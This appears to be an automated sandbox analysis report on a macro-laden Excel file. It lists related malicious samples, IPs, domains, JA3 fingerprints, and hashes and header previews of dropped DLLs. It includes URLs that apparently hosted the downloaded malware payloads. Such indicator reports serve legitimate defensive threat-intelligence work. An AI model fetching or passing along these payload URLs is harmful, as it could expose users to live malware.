                              Cookbook Comments:
                              • Found application associated with file extension: .xls
                              • Adjust boot time
                              • Enable AMSI
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              18:58:33API Interceptor3860x Sleep call for process: regsvr32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              112.213.89.85UTZU-2295996.xlsGet hashmaliciousBrowse
                              • sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/
                              allegato-2305.xlsGet hashmaliciousBrowse
                              • sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/
                              103.45.230.202FILE_13.xlsGet hashmaliciousBrowse
                                UTZU-2295996.xlsGet hashmaliciousBrowse
                                  allegato-2305.xlsGet hashmaliciousBrowse
                                    165.22.73.229Datei_26744565.xlsGet hashmaliciousBrowse
                                      DETAILS 25922194612.xlsGet hashmaliciousBrowse
                                        3vYbe1bYFd.dllGet hashmaliciousBrowse
                                          3vYbe1bYFd.dllGet hashmaliciousBrowse
                                            nZNmWqwnpr.dllGet hashmaliciousBrowse
                                              W3XqCWvDWC.dllGet hashmaliciousBrowse
                                                JtJ50Swtfo.dllGet hashmaliciousBrowse
                                                  nZNmWqwnpr.dllGet hashmaliciousBrowse
                                                    W3XqCWvDWC.dllGet hashmaliciousBrowse
                                                      JtJ50Swtfo.dllGet hashmaliciousBrowse
                                                        VUzZGNPCim.dllGet hashmaliciousBrowse
                                                          ZWc3yi399O.dllGet hashmaliciousBrowse
                                                            QK2fMdqsA1.dllGet hashmaliciousBrowse
                                                              CVVgbFa04U.dllGet hashmaliciousBrowse
                                                                HN8n4TeTGO.dllGet hashmaliciousBrowse
                                                                  VUzZGNPCim.dllGet hashmaliciousBrowse
                                                                    ZWc3yi399O.dllGet hashmaliciousBrowse
                                                                      QK2fMdqsA1.dllGet hashmaliciousBrowse
                                                                        HN8n4TeTGO.dllGet hashmaliciousBrowse
                                                                          CVVgbFa04U.dllGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            newkano.comFILE_13.xlsGet hashmaliciousBrowse
                                                                            • 103.45.230.202
                                                                            UTZU-2295996.xlsGet hashmaliciousBrowse
                                                                            • 103.45.230.202
                                                                            allegato-2305.xlsGet hashmaliciousBrowse
                                                                            • 103.45.230.202
                                                                            myphamcuatui.comFILE_13.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            UTZU-2295996.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            allegato-2305.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            Scan 69.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            ocalogullari.comFILE_13.xlsGet hashmaliciousBrowse
                                                                            • 188.132.217.108
                                                                            UTZU-2295996.xlsGet hashmaliciousBrowse
                                                                            • 188.132.217.108
                                                                            allegato-2305.xlsGet hashmaliciousBrowse
                                                                            • 188.132.217.108
                                                                            Details_2022.19.05_1156.lnkGet hashmaliciousBrowse
                                                                            • 188.132.217.108
                                                                            INF_19_05_2022.lnkGet hashmaliciousBrowse
                                                                            • 188.132.217.108
                                                                            sieuthiphutungxenang.comUTZU-2295996.xlsGet hashmaliciousBrowse
                                                                            • 112.213.89.85
                                                                            allegato-2305.xlsGet hashmaliciousBrowse
                                                                            • 112.213.89.85

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            SUPERDATA-AS-VNSUPERDATA-VNMAIL-082843406.xlsGet hashmaliciousBrowse
                                                                            • 112.213.89.145
                                                                            FILE_13.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            UTZU-2295996.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            allegato-2305.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            Scan 69.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            Shipping doc.xlsxGet hashmaliciousBrowse
                                                                            • 103.7.40.183
                                                                            ihXDUgnoO1.exeGet hashmaliciousBrowse
                                                                            • 112.213.89.123
                                                                            #Uff08#U5f15#U7528#Uff09.exeGet hashmaliciousBrowse
                                                                            • 112.213.89.73
                                                                            https://bit.ly/3KOvkMYGet hashmaliciousBrowse
                                                                            • 103.1.238.47
                                                                            IZJ-03022022.xlsmGet hashmaliciousBrowse
                                                                            • 112.213.89.130
                                                                            E196UGRfYI.exeGet hashmaliciousBrowse
                                                                            • 112.213.93.138
                                                                            WHTOFWMFR.xlsmGet hashmaliciousBrowse
                                                                            • 112.213.89.136
                                                                            DOC10077564411241521013.docGet hashmaliciousBrowse
                                                                            • 112.213.89.136
                                                                            DOC10077564411241521013.docGet hashmaliciousBrowse
                                                                            • 112.213.89.136
                                                                            Linux_x86Get hashmaliciousBrowse
                                                                            • 103.1.237.221
                                                                            ZByFnffjIp.exeGet hashmaliciousBrowse
                                                                            • 112.213.89.167
                                                                            Swift Message.exeGet hashmaliciousBrowse
                                                                            • 112.213.92.150
                                                                            order_doc.exeGet hashmaliciousBrowse
                                                                            • 103.7.43.244
                                                                            vXVSbqN7B6.exeGet hashmaliciousBrowse
                                                                            • 112.213.89.26

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            7dcce5b76c8b17472d024758970a406bMAIL-082843406.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            FILE_13.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            SecuriteInfo.com.Exploit.Siggen3.32567.15846.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            UTZU-2295996.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            allegato-2305.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Scan 2022.20.05_0910.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Rechnung.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Invoice.docxGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            RechnungsDetails.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            melimar.com.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            report 340.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            info_1.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Facture_09.02.2022_V2.xlsbGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Scan 69.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            Address Changed.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            10082376542717622006.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202
                                                                            6691113204648532361.xlsGet hashmaliciousBrowse
                                                                            • 103.1.238.211
                                                                            • 103.45.230.202

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):61480
                                                                            Entropy (8bit):7.9951219482618905
                                                                            Encrypted:true
                                                                            SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                            MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                            SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                            SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                            SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                            Malicious:false
                                                                            Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):330
                                                                            Entropy (8bit):3.115844330587536
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKjtWdoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:7IFkPlE99SNxAhUesE1
                                                                            MD5:EC2FA1C0B72EB22683FD7CE30EE7F711
                                                                            SHA1:0EB28381536C9BD3F28FE8274A63B61DFB275CBF
                                                                            SHA-256:F4ECF75ED9FC5CAA235C917CE2191A50A22B2E232D889AFE4ACD6A65721D9803
                                                                            SHA-512:04C99EFAADE4D7C102636FF98F89A97B135B13FF08FDAA8194816232761B72912FB186A0E500337C5B8EAFD3A42C558FB7AA706705F29BBE44F8A9D5DB901FB8
                                                                            Malicious:false
                                                                            Preview:p...... ..........i..o..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4bP[1].dll

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:downloaded
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            IE Cache URL:http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nB5U[1].dll

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dll

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\QqHRFPCw2sMluT[1].dll

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:downloaded
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            IE Cache URL:http://ocalogullari.com/inc/Wcm82enrs8/
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\CabF3F8.tmp

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):61480
                                                                            Entropy (8bit):7.9951219482618905
                                                                            Encrypted:true
                                                                            SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                            MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                            SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                            SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                            SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                            Malicious:false
                                                                            Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                                                            C:\Users\user\AppData\Local\Temp\TarF3F9.tmp

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):162196
                                                                            Entropy (8bit):6.301436092020807
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                                                            MD5:E721613517543768F0DE47A6EEEE3475
                                                                            SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                                                            SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                                                            SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                                                            Malicious:false
                                                                            Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                            C:\Users\user\AppData\Local\Temp\~DF5B07AF81F1DC3940.TMP

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):28672
                                                                            Entropy (8bit):3.382010128008885
                                                                            Encrypted:false
                                                                            SSDEEP:768:uDTKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+VtGk1:uPKpb8rGYrMPe3q7Q0XV5xtezE8vG8UP
                                                                            MD5:B3C783F41DC679AC28E18C8F09548F9B
                                                                            SHA1:579F1E5CA17158B98AAB8E406D543DE8D8F03A8E
                                                                            SHA-256:48F338296C6B33237CB9F97A44B4F2A0AA7527ED7BCE8E3054B7DBEF5C6BC1CE
                                                                            SHA-512:68DC3E7CE144B2119E53406BBBF3891ECBC4705E7C32999A884C2D1FAE8AEC12D649612A984673816DB4C2B195E35826C919B73E6BE6E60E23109C91088BC89B
                                                                            Malicious:false
                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\Desktop\allegati_23052022.xls

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Mon May 23 10:04:20 2022, Security: 0
                                                                            Category:dropped
                                                                            Size (bytes):54784
                                                                            Entropy (8bit):5.806332902745633
                                                                            Encrypted:false
                                                                            SSDEEP:1536:UPKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+bSgNeEYL8ECyC:cKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMI
                                                                            MD5:4912A99060F881FBF0AA6B9FD5C113BC
                                                                            SHA1:A95048CD0A0F1E7D46FF53FC7674C8E68B2A86D7
                                                                            SHA-256:7E5F333C7FD84D334AB049FD15716CE70239D139666A7AA7A63E6155AB3A78E4
                                                                            SHA-512:72E41B56353C53C64516655283495D73ABA1CF8B4F2D56BB76305466EDE911E7D0263825908055F9D8208D4F7956F4EC37920293835B3E7690B5E2BDCDE1B343
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\allegati_23052022.xls, Author: John Lambert @JohnLaTwC
                                                                            Preview:......................>.......................i...........................h...........................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......

                                                                            C:\Users\user\cusoa1.ocx

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\cusoa2.ocx

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
